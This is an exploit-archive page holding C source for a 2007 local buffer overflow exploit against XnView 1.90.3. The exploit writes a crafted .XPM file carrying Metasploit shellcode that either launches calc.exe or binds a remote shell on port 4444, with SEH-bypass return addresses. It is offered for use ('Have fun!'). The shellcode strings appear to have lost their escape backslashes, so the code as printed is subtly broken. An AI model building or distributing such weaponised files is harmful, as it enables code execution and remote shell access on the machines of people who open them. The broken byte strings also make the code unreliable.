XnView 1.90.3 (.XPM File) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XnView 1.90.3 (.XPM File) Local Buffer Overflow Exploit
# Published : 2007-04-22
# Author : Marsu
# Previous Title : MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2
# Next Title : OllyDbg 1.10 Local Format String Exploit
/*****************************************************************************
*                                                                            *
*                  XnView 1.90.3 .XPM File Buffer Overflow                   *
*                                                                            *
*                                                                            *
* XnView is vulnerable to a buffer overflow while processing a crafted XPM   *
* File. It fails to check the length of the arguments passed to the defined  *
* array which leads to code execution.                                       *
* This exploit runs calc.exe or binds shell to port 4444.                    *
*                                                                            *
* Tested against Win XP SP2 FR.                                              *
* Have Fun!                                                                  *
*                                                                            *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>                 *
*****************************************************************************/

#include "stdio.h"
#include "stdlib.h"

/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x98"
"x11xbexa7x83xebxfcxe2xf4x64xf9xfaxa7x98x11x35xe2"
"xa4x9axc2xa2xe0x10x51x2cxd7x09x35xf8xb8x10x55xee"
"x13x25x35xa6x76x20x7ex3ex34x95x7exd3x9fxd0x74xaa"
"x99xd3x55x53xa3x45x9axa3xedxf4x35xf8xbcx10x55xc1"
"x13x1dxf5x2cxc7x0dxbfx4cx13x0dx35xa6x73x98xe2x83"
"x9cxd2x8fx67xfcx9axfex97x1dxd1xc6xabx13x51xb2x2c"
"xe8x0dx13x2cxf0x19x55xaex13x91x0exa7x98x11x35xcf"
"xa4x4ex8fx51xf8x47x37x5fx1bxd1xc5xf7xf0x6fx66x45"
"xebx79x26x59x12x1fxe9x58x7fx72xdfxcbxfbx3fxdbxdf"
"xfdx11xbexa7";


/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char BindShellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x5c"
"x7bx78x7fx83xebxfcxe2xf4xa0x11x93x32xb4x82x87x80"
"xa3x1bxf3x13x78x5fxf3x3ax60xf0x04x7ax24x7ax97xf4"
"x13x63xf3x20x7cx7ax93x36xd7x4fxf3x7exb2x4axb8xe6"
"xf0xffxb8x0bx5bxbaxb2x72x5dxb9x93x8bx67x2fx5cx57"
"x29x9exf3x20x78x7ax93x19xd7x77x33xf4x03x67x79x94"
"x5fx57xf3xf6x30x5fx64x1ex9fx4axa3x1bxd7x38x48xf4"
"x1cx77xf3x0fx40xd6xf3x3fx54x25x10xf1x12x75x94x2f"
"xa3xadx1ex2cx3ax13x4bx4dx34x0cx0bx4dx03x2fx87xaf"
"x34xb0x95x83x67x2bx87xa9x03xf2x9dx19xddx96x70x7d"
"x09x11x7ax80x8cx13xa1x76xa9xd6x2fx80x8ax28x2bx2c"
"x0fx28x3bx2cx1fx28x87xafx3ax13x69x23x3ax28xf1x9e"
"xc9x13xdcx65x2cxbcx2fx80x8ax11x68x2ex09x84xa8x17"
"xf8xd6x56x96x0bx84xaex2cx09x84xa8x17xb9x32xfex36"
"x0bx84xaex2fx08x2fx2dx80x8cxe8x10x98x25xbdx01x28"
"xa3xadx2dx80x8cx1dx12x1bx3ax13x1bx12xd5x9ex12x2f"
"x05x52xb4xf6xbbx11x3cxf6xbex4axb8x8cxf6x85x3ax52"
"xa2x39x54xecxd1x01x40xd4xf7xd0x10x0dxa2xc8x6ex80"
"x29x3fx87xa9x07x2cx2ax2ex0dx2ax12x7ex0dx2ax2dx2e"
"xa3xabx10xd2x85x7exb6x2cxa3xadx12x80xa3x4cx87xaf"
"xd7x2cx84xfcx98x1fx87xa9x0ex84xa8x17xacxf1x7cx20"
"x0fx84xaex80x8cx7bx78x7f";


char XPMHeaders[]=
"x2fx2ax20x58x50x4dx20x2ax2fx0dx0ax73x74x61x74x69"
"x63x20x63x68x61x72x20x2ax50x69x78x6dx61x70x5bx5d"
"x20x3dx20x7bx0dx0ax22x35x30x39x20x34x33x38x20x32"
"x35x36x20x33x22x2cx0dx0ax22";

int main(int argc, char* argv[])
{
	FILE* xpmfile;
	char evilbuff[6600];
	int offset=0;

	printf("[+] XnView 1.90.3 .XPM File Buffer Overflown");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
	if (argc!=3) {
		printf("[+] Usage: %s Mode <file.xpm>n",argv[0]);
		printf("[+] Mode is 0 -> run calc.exen");
		printf("[+]         1 -> bind shell to port 4444n");
		return 0;
	}
	
	memset(evilbuff,'A',6600);
	memcpy(evilbuff,XPMHeaders,sizeof(XPMHeaders)-1);
	
	//Ret address depends of the way you open the document
	//jmp over EIP + pop pop ret in ??? to defeat SEH protection + jmp back to our shellcode
	//there are 3ret add because files can be accessed in multiple ways
	memcpy(evilbuff+0xead,"x90x90xebx05x2ax02xfcx7fx41xe9x8axf1xffxff",14);
	memcpy(evilbuff+0x1299,"x90x90xebx05x2ax02xfcx7fx41xe9x9exedxffxff",14);
	memcpy(evilbuff+0x1799,"x90x90xebx05x2ax02xfcx7fx41xe9x9exe8xffxff",14);
	
	if (!atoi(argv[1]))
		memcpy(evilbuff+sizeof(XPMHeaders)+0x10,CalcShellcode,strlen(CalcShellcode));
	else
		memcpy(evilbuff+sizeof(XPMHeaders)+0x10,BindShellcode,strlen(BindShellcode));

	//End of file
	memcpy(evilbuff+0x1916,"x22x0dx0ax29x3bx0dx0a",7);
		
	if ((xpmfile=fopen(argv[2],"wb"))==0) {
		printf("[-] Unable to access file.n");
		return 0;
	}
	
	fwrite( evilbuff, 1, 6600, xpmfile );
	fclose(xpmfile);
	printf("[+] Done. Have fun!n");
	return 0;
	
}

// www.Syue.com [2007-04-22]